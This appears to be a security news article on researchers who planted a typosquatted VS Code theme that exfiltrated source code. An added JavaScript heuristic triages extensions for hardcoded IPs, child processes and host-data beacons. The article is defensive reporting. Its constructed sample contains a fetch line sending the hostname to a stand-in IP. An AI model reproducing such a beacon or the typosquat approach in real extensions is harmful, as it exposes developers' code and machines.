Attack Surface Management, Security Operations
Researchers Infiltrate Major Organizations Using Fake Extension
Cybersecurity researchers say an experiment in developing a fake, malicious extension for the world’s most popular integrated development environment succeeded beyond their wildest expectations.
Researchers Amit Assaraf, Itay Kruk, and Idan Dardikman uploaded an extension to Microsoft's source code editing platform Visual Studio Code masquerading as “Dracula Official,” a color theme that records nearly 7.2 million installs.
Assaraf and company called their theme “Darcula Official.”
Extensions are an important feature of VSCode – the idea is for developers to turn their instance of VSCode into a customizable editor with the features they want beyond the bare-bones functionality provided out of the box. In a blog post, Assaraf said he counts approximately 60,000 VSCode extensions from about 45,000 different publishers. Only about 1,800 of them are verified – but it turns out that becoming a verified publisher requires little more than proving control over a domain, which the researchers did for darculatheme.com.
The extension gained popularity rapidly, with over 100 installs in a day, including – Assaraf wrote without naming the company – on a Windows machine within a publicly listed company worth $483 billion. The fake extension exfiltrated source code and also sent beacons with detailed host machine information, including hostname, domain, platform and number of installed extensions.
Their success comes down to poor design choices by Microsoft, Assaraf wrote in a follow-up blog post.
“Microsoft has not implemented any sorts of permission management or visibility for installed extensions, meaning that any extension can perform any API action,” he said. “For example, a theme extension that should only change the colors of my IDE, may execute code and read or write files without any visibility or explicit authorization from the user.”
Microsoft also doesn’t limit what VSCode extensions can do on the host machine. “They can spawn child processes, they can execute system calls, they can import any NodeJS package they’d like, making them highly risky.” The researcher also faulted Microsoft for permitting silent, automatic updates of extensions – opening a path for hackers to propagate a legitimate extension and later turn it malicious.
The researchers investigated whether malevolent actors have previously exploited similar tactics and discovered 1,283 extensions containing malicious code. The extensions amassed 229 million installs. They also found 8,161 extensions communicating with hardcoded IP addresses, 1,452 running unknown executable binaries, and 2,304 using another publisher’s GitHub repo as their official repository.
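The gap described above (a theme can ship arbitrary code, and the researchers' indicators were hardcoded IP addresses, spawned processes and host-fingerprinting beacons) can be triaged from an extension's own files. The following is an added example written for this page, not the researchers' ExtensionTotal tool or any Microsoft code; the heuristics and the sample manifest and source are constructed for illustration.

```javascript
// Heuristic triage of a VS Code extension from its package.json and bundled JS.
// A colour theme only needs "contributes.themes"; an entry point ("main"/"browser"),
// activation on every startup, hardcoded IPs, child_process use, or host details
// sent over the network are the signals the article describes. Hypothetical checks.
const IPV4 = /\b(?:\d{1,3}\.){3}\d{1,3}\b/g;

function triageExtension(manifest, sourceFiles) {
  const findings = [];
  const contributes = manifest.contributes || {};
  const themeOnly = Boolean(contributes.themes) &&
    Object.keys(contributes).every((k) => k === 'themes');
  // A theme-only extension has no reason to load JavaScript at all.
  if (themeOnly && (manifest.main || manifest.browser)) {
    findings.push('theme-only extension declares a JavaScript entry point');
  }
  if ((manifest.activationEvents || []).includes('*')) {
    findings.push('activates on every startup ("*")');
  }
  for (const [name, text] of Object.entries(sourceFiles)) {
    // Loopback addresses are common in dev tooling; everything else is worth a look.
    const ips = [...new Set(text.match(IPV4) || [])].filter((ip) => !ip.startsWith('127.'));
    if (ips.length) findings.push(`${name}: hardcoded IP address(es) ${ips.join(', ')}`);
    if (/require\(['"]child_process['"]\)|from ['"]child_process['"]/.test(text)) {
      findings.push(`${name}: spawns child processes`);
    }
    if (/\bos\.(hostname|platform|userInfo)\(/.test(text) && /https?:\/\//.test(text)) {
      findings.push(`${name}: collects host details and talks to the network`);
    }
  }
  return findings;
}

// Constructed sample: a "theme" manifest that also ships code (203.0.113.0/24 is a
// documentation range, used here as a stand-in for a hardcoded address).
const sampleManifest = {
  name: 'example-theme',
  contributes: { themes: [{ label: 'Example', path: './themes/example.json' }] },
  main: './out/extension.js',
  activationEvents: ['*'],
};
const sampleSource = {
  'out/extension.js':
    "const os = require('os');\nconst cp = require('child_process');\n" +
    "fetch('http://203.0.113.10/c', { method: 'POST', body: os.hostname() });",
};
const cleanManifest = { name: 'clean-theme', contributes: { themes: [{ label: 'Clean' }] } };

console.log(triageExtension(sampleManifest, sampleSource));
console.log(triageExtension(cleanManifest, {}));
```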
In response to their findings, the researchers started a process of responsible disclosure with affected companies. They are also developing “ExtensionTotal,” a tool aimed at analyzing and assessing the risk of VSCode extensions.